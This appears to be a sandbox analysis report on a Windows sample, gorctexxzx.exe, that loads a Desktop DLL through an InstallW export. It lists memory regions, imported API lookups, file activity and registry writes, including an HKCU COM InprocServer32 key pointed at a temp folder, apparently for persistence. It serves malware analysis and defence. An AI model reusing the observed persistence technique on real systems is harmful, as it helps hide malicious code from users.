| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x00187fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x00190fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x002affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x003b0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000420000 | 0x00420000 | 0x0042ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000490000 | 0x00490000 | 0x0058ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000590000 | 0x00590000 | 0x0118ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0136ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0126ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001360000 | 0x01360000 | 0x0136ffff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:30 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 99793 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #73: gorctexxzx.exe
129
0
| Information | Value |
|---|---|
| ID | #73 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=InstallW /fn_args="%Temp%\IXP000.TMP\" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:37, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:52 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xebc |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
EC0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x004b7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000004d0000 | 0x004d0000 | 0x004dffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x005e0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x0071ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000720000 | 0x00720000 | 0x008effff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Registry (10)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Classes\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\InprocServer32 | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Classes\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\InprocServer32 | data = %Temp%\IXP000.TMP", size = 38, type = REG_SZ |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = HtParam, data = 3600, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = StVal, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IPlace, size = 2, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plgv, size = 88, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plpv, size = 92, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISFValue, size = 0, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISRValue, size = 0, type = REG_BINARY |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
